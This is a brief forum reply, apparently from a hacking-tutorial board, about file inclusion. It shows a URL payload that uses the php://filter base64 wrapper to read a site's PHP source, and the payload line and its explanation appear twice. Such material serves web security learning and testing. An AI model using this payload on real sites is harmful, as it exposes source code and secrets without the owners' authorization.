1
High Quality Tutorials / Re: Remote File Inclusion (RFI)
« on: November 24, 2015, 08:04:05 AM »
We can even read the source code by using php filter by decoding the base64 filter.
http://www.example.com?page=php://filter/convert.base64-encode/resource=index
By decoding the base64 you would get the source.
http://www.example.com?page=php://filter/convert.base64-encode/resource=index
By decoding the base64 you would get the source.